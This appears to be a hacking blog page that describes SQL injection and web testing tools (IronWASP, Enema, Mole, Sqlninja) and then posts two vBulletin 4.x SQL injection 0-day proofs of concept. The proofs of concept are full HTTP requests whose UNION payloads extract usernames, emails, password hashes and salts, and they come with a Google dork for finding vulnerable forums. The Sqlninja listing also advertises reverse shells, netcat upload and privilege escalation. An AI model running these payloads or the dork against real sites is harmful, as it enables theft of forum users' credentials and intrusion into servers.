IronWASP – Iron Web application Advanced Security testing Platform
IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing. It is designed to be customizable to the extent where users can create their own custom security scanners using it. Though an advanced user with Python/Ruby scripting expertise would be able to make full use of the platform, a lot of the tool’s features are simple enough to be used by absolute beginners.
Learn more about it here | Download from here
Passive Plug-ins
- Analyzes all traffic going through the tool
- Can also modify the traffic
- Identifies vulnerabilities passively
Eg: Passwords sent over clear-text, Http-Only /Secure flag missing in cookies
Active Plug-ins
- Performs scans against the target to
- identify vulnerabilities
- Executed only when the user explicitly
- calls them
- Fine-grained scanning support
Eg: Cross-site Scripting, SQL Injection
IronWASP performs Taint Analysis forDOM based XSS, identifies Sources and Sinks and traces them through the code. Also custom Source and Sink objects can be configured.
Enema – tool for SQL injection
Enema is not autohacking software. This is dynamic tool for people, who knows what to do.
Not supported old database versions (e. g. mysql 4.x). Development targeted to modern versions.
- Features:
- Multi-platform.
- User-friendly graphical interface.
- Multithreaded.
- Dump.
- Customise your queries
- Plugins to automate attacks
- Supported for today:
- POST, GET, Cookies
- MSSQL >=2000 and MySQL>=5.0
- Injection methods supported for today:
- Error based injection.
- Union based injection (using subquery).
- Blind Time-based MSSQL(waitfor), MySQL(sleep)
Enema is not autohacking software. This is dynamic tool for people, who knows what to do. Not supported old database versions (e. g. mysql 4.x). Development targeted to modern versions.
Download here
Mole – automatic SQL Injection exploitation tool
The Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique.
Features:
* Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
* Command line interface. Different commands trigger different actions.
* Auto-completion for commands, command arguments and database, table and columns names.
* Support for query filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
* Developed in python 3.
Download windows version or linux
Tutorial and webpage here.
Sqlninja 0.2.6 available – Download
Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end.
Its main goal is to provide a remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.
In order to use sqlninja, the following Perl modules need to be present:
* NetPacket
* Net-Pcap
* Net-DNS
* Net-RawIP
* IO-Socket-SSL
Features
* Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode)
* Bruteforce of 'sa' password (in 2 flavors: dictionary-based and incremental)
* Privilege escalation to sysadmin group if 'sa' password has been found
* Creation of a custom xp_cmdshell if the original one has been removed
* Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed)
* TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell
* Direct and reverse bindshell, both TCP and UDP
* ICMP-tunneled shell, when no TCP/UDP ports are available for a direct/reverse shell but the DB can ping your box
* DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames (check the documentation for details about how this works)
* Evasion techniques to confuse a few IDS/IPS/WAF
* Integration with Metasploit3, to obtain a graphical access to the remote DB server through a VNC server injection
* Integration with churrasco.exe, to escalate privileges to SYSTEM on w2k3 via token kidnapping
* Support for CVE-2010-0232, to escalate the privileges of sqlservr.exe to SYSTEM
Download here
vBulletin “Search UI” SQL Injection 0-day – part II
vBulletin "Search UI" SQL Injection
PoC:
[cc lang="html"]POST /search.php?do=process HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /* [/cc]
will retrun:
[cc lang="html"] [/cc]
Vbulletin 4.0.x -> 4.1.3 SQL injection Vulnerability 0-day
So... after the patching done 2 months ago by vBulletin team here it is:
Vulnerability:
Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection Vulnerability in parameter "&messagegroupid" due to improper input validation.
Exploitation:
Post data on: -->search.php?search_type=1
--> Search Single Content Type
Keywords : Valid Group Message
Search Type : Group Messages
Search in Group : Valid Group Id
[cc lang="html"]&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#[/cc]
Exact request:
Exact Request as follows:
Code:
[cc lang="html"]query=Cross+Domain+Content+Extraction+attacks&titleonly=0&searchuser=&starteronly=0&searchdate=0&beforeafter=after&sortby=dateline&order=descending&showposts=1&saveprefs=1&dosearch=Search+Now&s=&securitytoken=1311201469-a9ee9dd6adccba0f8758fce3f02b7e0a267eea75&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#[/cc]
Google dork: intitle: powered by Vbulletin 4
Author: FB1H2S
Found his blog. Awesome posts.
Disclaimer
Categories
- android (1)
- antivirus (1)
- backup (1)
- backup exec (2)
- bruteforce (6)
- conference (2)
- CRSF (2)
- DirectAdmin (1)
- DoS (11)
- enumeration (2)
- Fără categorie (2)
- flash (2)
- Fuzzer (2)
- games (1)
- hacking (116)
- how-to (32)
- Information gathering (2)
- lfi (3)
- linux (27)
- mobile (1)
- ms exchange (2)
- News (2)
- Phishing (1)
- php (1)
- rdp (1)
- rfi (5)
- rootkit (1)
- scripts (33)
- seo (1)
- sniff (3)
- social engineering (2)
- source code (33)
- sqli (16)
- ssh (2)
- symantec (3)
- tools (73)
- tutorials (20)
- tutorials (1)
- Uncategorized (7)
- vranger (1)
- windows (12)
- wireless (1)
- wsus (1)
- xpath (1)
- xsrf (1)
- xss (12)
